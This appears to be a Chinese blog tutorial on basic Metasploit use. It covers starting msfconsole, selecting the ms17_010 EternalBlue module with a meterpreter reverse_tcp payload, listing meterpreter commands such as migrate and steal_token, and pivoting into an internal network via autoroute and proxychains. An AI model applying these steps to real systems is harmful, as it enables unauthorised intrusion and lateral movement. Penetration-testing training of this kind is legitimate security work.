msf使用基础

前言

msf是后渗透神奇,在kali中已经内置有。

1.1 基础使用
metasploit程序需要使用postgresql数据库

手动启动数据库:

service postgresql start

设置成开机启动数据库:

systemctl enable postgresql

启动msf

msfconsole

1.2.查找模块

search 模块名
//比如我要找永恒之蓝 search ms17_010

在这里插入图片描述
使用那个模块 use 模块名或use 前面的数字都可以
在这里插入图片描述在这里插入图片描述
1.3使用模块

#查看要设置的参数
show options
#查看模块详情
info
#设置载荷  有很多可以自行选择
 set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#运行模块
run 或者 exploit

在这里插入图片描述
在这里插入图片描述
1.4.命令行模式的一些基础操作
输入help可以查看支持的操作,但是乱码了,莫慌,可以解决。
在这里插入图片描述
输入 chcp 65001
在这里插入图片描述
乱码没有了

核心后台脚本:

​		bgkill       关闭一个后台的meterpreter脚本

​		bglist	   列出所有正在运行的后台脚本

​		bgrun	   将一个meterpreter脚本以后台线程模式运行

​		channel   显示或者控制一个活动频道

​		close 		关闭一个频道

​		exit			终止meterpreter会话

​		get_timeouts	获得当前会话的timeout值

		getuid			查看当前权限

​		help			帮助菜单

​		info 			显示post模块信息

​		irb				进入ruby脚本模式

​		load			加载meterpreter扩展

​		migrate	   将会话迁移到一个指定PID的进程

​		quit			 结束meterpreter会话

​		read			从频道中读取数据

​		resource	运行文件中的命令

​		run 			执行一个meterpreter脚本或者post模块

​		sessions    快速地切换到另一个会话

​		background	切换到后台

		run checkvm  查看是否是虚拟机

		steal_token 伪造身份

伪造身份:
在这里插入图片描述
2.1实战演示

在这里插入图片描述

  • 通过永恒之蓝拿到跳板机
    在这里插入图片描述
  • 拿到跳板机之后添加路由
    在这里插入图片描述
添加攻击IP添加到目标机路由表中

也可以 run autoroute -s 10.10.10.0/24

或者手动添加

route add 10.10.10.0 255.255.255.0
  • 接下来设置代理
    在这里插入图片描述

接下来用kali上的神奇proxychains

vi /etc/proxychains.conf

在这里插入图片描述
测试是否能连内网的机器
在这里插入图片描述
可以成功连接
通过代理工具开启msf
在这里插入图片描述
接下来就可以直接搞内网了。实战中可能有多层网段。就需要挂多层代理

msf中有很多 攻击载荷模块,嗅探模块和后渗透模块。大家后期可以深入的去研究研究。

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值